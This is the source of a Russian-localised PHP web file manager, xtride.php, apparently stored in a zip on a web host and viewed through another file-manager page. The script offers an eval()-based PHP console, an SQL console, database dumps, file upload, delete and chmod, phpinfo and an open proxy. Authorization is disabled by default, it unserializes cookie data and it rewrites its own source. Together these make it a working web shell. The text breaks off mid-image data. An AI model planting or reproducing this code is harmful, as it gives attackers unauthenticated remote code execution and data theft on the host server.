Файловый менеджер - Редактировать - /home/gqdcvggs/go.imators.com/play.peerkinton.com.zip
Назад
PK �)�[�I�]: ]: xtride.phpnu �[��� <?php /* PHP File manager ver 1.6 */ // Configuration — do not change manually! $authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":""}'; $php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}'; $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}'; $translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search": "Рекурсивный поиск","Mask":"Маска"}'; // end configuration // Preparations $starttime = explode(' ', microtime()); $starttime = $starttime[1] + $starttime[0]; $langs = array('en','ru','de','fr','uk'); $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']); $path = str_replace('\\', '/', $path) . '/'; $main_path=str_replace('\\', '/',realpath('./')); $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false; $msg = ''; // service string $default_language = 'ru'; $detect_lang = true; $fm_version = 1.6; ini_set('display_errors', '1'); ini_set('display_startup_errors', '1'); error_reporting(E_ALL); //Authorization $auth = json_decode($authorization,true); $auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0; $auth['days_authorization'] = (isset($auth['days_authorization'])&&is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30; $auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin'; $auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm'; $auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user'; $auth['script'] = isset($auth['script']) ? $auth['script'] : ''; // Little default config $fm_default_config = array ( 'make_directory' => true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; // Localization $lang = json_decode($translation,true); if ($lang['id']!=$language) { $get_lang = file_get_contents('https://raw.githubusercontent.com/henriyzx/Filemanager/master/languages/' . $language . '.json'); if (!empty($get_lang)) { //remove unnecessary characters $translation_string = str_replace("'",''',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE)); $fgc = file_get_contents(__FILE__); $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } $lang = json_decode($translation_string,true); } } /* Functions */ //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 'u'; } } //Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); //Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); //World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function fm_convert_rights($mode) { $mode = str_pad($mode,9,'-'); $trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1'); $mode = strtr($mode,$trans); $newmode = '0'; $owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; $group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; $world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; $newmode .= $owner . $group . $world; return intval($newmode, 8); } function fm_chmod($file, $val, $rec = false) { $res = @chmod(realpath($file), $val); if(@is_dir($file) && $rec){ $els = fm_scan_dir($file); foreach ($els as $el) { $res = $res && fm_chmod($file . '/' . $el, $val, true); } } return $res; } //load files function fm_download($file_name) { if (!empty($file_name)) { if (file_exists($file_name)) { header("Content-Disposition: attachment; filename=" . basename($file_name)); header("Content-Type: application/force-download"); header("Content-Type: application/octet-stream"); header("Content-Type: application/download"); header("Content-Description: File Transfer"); header("Content-Length: " . filesize($file_name)); flush(); // this doesn't really matter. $fp = fopen($file_name, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); // this is essential for large downloads } fclose($fp); die(); } else { header('HTTP/1.0 404 Not Found', true, 404); header('Status: 404 Not Found'); die(); } } } //show folder size function fm_dir_size($f,$format=true) { if($format) { $size=fm_dir_size($f,false); if($size<=1024) return $size.' bytes'; elseif($size<=1024*1024) return round($size/(1024),2).' Kb'; elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).' Mb'; elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).' Gb'; elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).' Tb'; //:))) else return round($size/(1024*1024*1024*1024*1024),2).' Pb'; // ;-) } else { if(is_file($f)) return filesize($f); $size=0; $dh=opendir($f); while(($file=readdir($dh))!==false) { if($file=='.' || $file=='..') continue; if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file); else $size+=fm_dir_size($f.'/'.$file,false); } closedir($dh); return $size+filesize($f); } } //scan directory function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) { $dir = $ndir = array(); if(!empty($exp)){ $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/'; } if(!empty($type) && $type !== 'all'){ $func = 'is_' . $type; } if(@is_dir($directory)){ $fh = opendir($directory); while (false !== ($filename = readdir($fh))) { if(substr($filename, 0, 1) != '.' || $do_not_filter) { if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){ $dir[] = $filename; } } } closedir($fh); natsort($dir); } return $dir; } function fm_link($get,$link,$name,$title='') { if (empty($title)) $title=$name.' '.basename($link); return ' <a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>'; } function fm_arr_to_option($arr,$n,$sel=''){ foreach($arr as $v){ $b=$v[$n]; $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>'; } return $res; } function fm_lang_form ($current='en'){ return ' <form name="change_lang" method="post" action=""> <select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" > <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option> <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option> <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option> <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option> <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option> </select> </form> '; } function fm_root($dirname){ return ($dirname=='.' OR $dirname=='..'); } function fm_php($string){ $display_errors=ini_get('display_errors'); ini_set('display_errors', '1'); ob_start(); eval(trim($string)); $text = ob_get_contents(); ob_end_clean(); ini_set('display_errors', $display_errors); return $text; } //SHOW DATABASES function fm_sql_connect(){ global $fm_config; return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']); } function fm_sql($query){ global $fm_config; $query=trim($query); ob_start(); $connection = fm_sql_connect(); if ($connection->connect_error) { ob_end_clean(); return $connection->connect_error; } $connection->set_charset('utf8'); $queried = mysqli_query($connection,$query); if ($queried===false) { ob_end_clean(); return mysqli_error($connection); } else { if(!empty($queried)){ while($row = mysqli_fetch_assoc($queried)) { $query_result[]= $row; } } $vdump=empty($query_result)?'':var_export($query_result,true); ob_end_clean(); $connection->close(); return '<pre>'.stripslashes($vdump).'</pre>'; } } function fm_backup_tables($tables = '*', $full_backup = true) { global $path; $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; if($tables == '*') { $tables = array(); $result = $mysqldb->query('SHOW TABLES'); while($row = mysqli_fetch_row($result)) { $tables[] = $row[0]; } } else { $tables = is_array($tables) ? $tables : explode(',',$tables); } $return=''; foreach($tables as $table) { $result = $mysqldb->query('SELECT * FROM '.$table); $num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if ($full_backup) { for ($i = 0; $i < $num_fields; $i++) { while($row = mysqli_fetch_row($result)) { $return.= 'INSERT INTO `'.$table.'` VALUES('; for($j=0; $j<$num_fields; $j++) { $row[$j] = addslashes($row[$j]); $row[$j] = str_replace("\n","\\n",$row[$j]); if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; } if ($j<($num_fields-1)) { $return.= ','; } } $return.= ')'.$delimiter; } } } else { $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return); } $return.="\n\n\n"; } //save file $file=gmdate("Y-m-d_H-i-s",time()).'.sql'; $handle = fopen($file,'w+'); fwrite($handle,$return); fclose($handle); $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path . '\'"'; return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>'; } function fm_restore_tables($sqlFileToExecute) { $mysqldb = fm_sql_connect(); $delimiter = "; \n \n"; // Load and explode the sql file $f = fopen($sqlFileToExecute,"r+"); $sqlFile = fread($f,filesize($sqlFileToExecute)); $sqlArray = explode($delimiter,$sqlFile); //Process the sql file by statements foreach ($sqlArray as $stmt) { if (strlen($stmt)>3){ $result = $mysqldb->query($stmt); if (!$result){ $sqlErrorCode = mysqli_errno($mysqldb->connection); $sqlErrorText = mysqli_error($mysqldb->connection); $sqlStmt = $stmt; break; } } } if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute; else return $sqlErrorText.'<br/>'.$stmt; } function fm_img_link($filename){ return './'.basename(__FILE__).'?img='.base64_encode($filename); } function fm_home_style(){ return ' input, input.fm_input { text-indent: 2px; } input, textarea, select, input.fm_input { color: black; font: normal 8pt Verdana, Arial, Helvetica, sans-serif; border-color: black; background-color: #FCFCFC none !important; border-radius: 0; padding: 2px; } input.fm_input { background: #FCFCFC none !important; cursor: pointer; } .home { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAgRQTFRF/f396Ojo////tT02zr+fw66Rtj432TEp3MXE2DAr3TYp1y4mtDw2/7BM/7BOqVpc/8l31jcqq6enwcHB2Tgi5jgqVpbFvra2nBAV/Pz82S0jnx0W3TUkqSgi4eHh4Tsre4wosz026uPjzGYd6Us3ynAydUBA5Kl3fm5eqZaW7ODgi2Vg+Pj4uY+EwLm5bY9U//7jfLtC+tOK3jcm/71u2jYo1UYh5aJl/seC3jEm12kmJrIA1jMm/9aU4Lh0e01BlIaE///dhMdC7IA//fTZ2c3MW6nN30wf95Vd4JdXoXVos8nE4efN/+63IJgSnYhl7F4csXt89GQUwL+/jl1c41Aq+fb2gmtI1rKa2C4kJaIA3jYrlTw5tj423jYn3cXE1zQoxMHBp1lZ3Dgmqiks/+mcjLK83jYkymMV3TYk//HM+u7Whmtr0odTpaOjfWJfrHpg/8Bs/7tW/7Ve+4U52DMm3MLBn4qLgNVM6MzB3lEflIuL/+jA///20LOzjXx8/7lbWpJG2C8k3TosJKMA1ywjopOR1zYp5Dspiay+yKNhqKSk8NW6/fjns7Oz2tnZuz887b+W3aRY/+ms4rCE3Tot7V85bKxjuEA3w45Vh5uhq6am4cFxgZZW/9qIuwgKy0sW+ujT4TQntz423C8i3zUj/+Kw/a5d6UMxuL6wzDEr////cqJQfAAAAKx0Uk5T////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////AAWVFbEAAAAZdEVYdFNvZnR3YXJlAEFkb2JlIEltYWdlUmVhZHlxyWU8AAAA2UlEQVQoU2NYjQYYsAiE8U9YzDYjVpGZRxMiECitMrVZvoMrTlQ2ESRQJ2FVwinYbmqTULoohnE1g1aKGS/fNMtk40yZ9KVLQhgYkuY7NxQvXyHVFNnKzR69qpxBPMez0ETAQyTUvSogaIFaPcNqV/M5dha2Rl2Timb6Z+QBDY1XN/Sbu8xFLG3eLDfl2UABjilO1o012Z3ek1lZVIWAAmUTK6L0s3pX+jj6puZ2AwWUvBRaphswMdUujCiwDwa5VEdPI7ynUlc7v1qYURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__('File manager').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU